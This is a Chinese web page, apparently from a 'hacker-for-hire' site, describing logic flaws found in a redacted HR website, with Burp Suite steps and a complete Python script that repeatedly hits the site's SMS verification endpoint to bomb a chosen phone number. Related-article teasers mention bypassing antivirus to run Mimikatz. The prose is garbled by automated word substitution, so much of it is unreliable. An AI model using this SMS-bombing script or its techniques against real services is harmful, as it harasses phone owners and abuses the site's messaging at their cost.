某HR业务网站逻辑漏洞挖掘案例以及POC编写思路分享-黑客接单平台

访客6年前黑客工具1094
东西预备 BurpSuiteFree (或许咱们最喜爱最常用的抓包神器,需求Java环境); 火狐浏览器(个人比较喜爱的浏览器;360/Chrome等浏览器都能够); SwitchyOmega插件(设置快速切换署理的浏览器插件); Python3(用来后期编写批量验证缝隙损害的POC)。 测验方针 方针:https://www_hddddddddd_com/(脱敏) IP地址:47.***.**.** 运营商:我国香港阿里云|网站中间件:Tomcat 操作体系:Linux Web结构:Bootstrap 已挖掘出的逻辑缝隙类型 恣意手机用户注册; 注册短信验证码轰炸; 暗码重置邮件轰炸; 未授权拜访导致灵敏信息走漏。 一、恣意手机用户注册(低危) (1)翻开浏览器,拜访该HR事务体系的注册页面(如下图所示): (2)在注册人手机输入框中随意恣意输入一个11位的手机号码,然后在浏览器中按F12调试出浏览器的开发者东西点击”Network”。然后点击“获取验证码”的按钮。然后咱们能够清楚看到Response成功显现了6位验证码。 (3)从头获取6位验证码进行恣意账号注册: (4)成功复现恣意账户注册: 二、注册短信验证码轰炸 (1)翻开BurpSuiteFree设置好浏览器的本地署理: (2)咱们抓取获取验证码的恳求包: (3)然后按Ctrl+R把这个恳求包发送到“Repeater”模块: (4)然后点击“Go”发送恳求包检查呼应数据包: 能够看到呼应包成功呼应而且返回了6位的验证码。 (5)接连点击“Go”发送恳求包检查呼应包: 能够看到每次的呼应包中的6位验证码都不相同,疑似存在短信验证码轰炸缝隙,这时候咱们要祭出咱们的Python来编写”验证码轰炸的POC”。 POC编写中心思路:经过Requests模块批量模仿浏览器客户端恳求获取注册验证码的数据包发送。 短信验证码轰炸POC代码如下: # -- coding: utf-8 -- import requests session = requests.session() headers = {'Referer':"https://www.**********.com/*****/reg", 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} n=0 url=("https://www.*********.com/r***/getMobileCode") def SmsBoom(phpnumber,url): data = {'mobile': phpnumber,} ron = session.post(url, headers=headers, data=data) phpnumber = input("请输入你的手机号码:") AckNumber = int(input("请你输入进犯的次数:")) while True: SmsBoom(phpnumber,url) n += 1 print("[+]成功发送{}条".format(n)) if n == AckNumber: print('完毕进犯') break SmsBoom(phpnumber,url) POC运转作用截图: POC运转后会让你输入承受的手机号码和进犯测验的次数来验证短信验证码轰炸缝隙,然后回车POC就会主动运转了。 手机短信收件箱的截图: 成功接收到20条注册验证码短信,成功验证而且复现了短信验证码轰炸缝隙。[1][2][3]黑客接单网

相关文章

浅谈跨域威胁与安全-黑客接单平台

WEB前端中最常见的两种安全危险,XSS与CSRF,XSS,即跨站脚本进犯、CSRF即跨站恳求假造,两者归于跨域安全进犯,关于常见的XSS以及CSRF在此不多议论,仅议论一些不太常见的跨域技能以及安全...

九种姿态运转Mimikatz

前语 平常搜集的一些姿态,用户绕过杀软履行mimikatz,这儿以360为例进行bypass 测验。 下载最新版360: 未经处理的mimikatz直接就被杀了 下面开端进行绕过360抓暗码 姿态一-...

怎样使用追寻代码来发现网站之间的“相关”

前些年Lawrence Alexander颁发了一篇使用Google Analytics查找网页之间的联络联络的文章,客岁,我也宣告了一个关于若何使用Python自动开掘信息,然后将其可视化的帖子,不...

在Microsoft Edge中完成DOM树

DOM是Web渠道编程模型的根底,其规划和功用直接影响着浏览器管道(Pipeline)的模型,可是,DOM的前史演化却远不是一个简略的工作。 在曩昔三年中,微软的安全专家们早现已开端在Microsof...

Chafer运用的新的根据Python的有效载荷MechaFlounder

2019年11月,Chafer要挟小组针对土耳其政府从头运用他们在2019年早些时候运用的基础设施(Clearsky报导的活动中),特别是域名win10-update [.] com。尽管咱们没有见到...

网站检测提示的“Flash装备不妥”是什么缝隙?

 360站长渠道中有一个东西是“官网直达”,经过恳求能够使你的网站在360搜索成果中加上“官网”字样的标识,百度也有这样的东西,不过是收费的,所以趁着360还没收费,有爱好的朋友可认为自己的网站恳求一...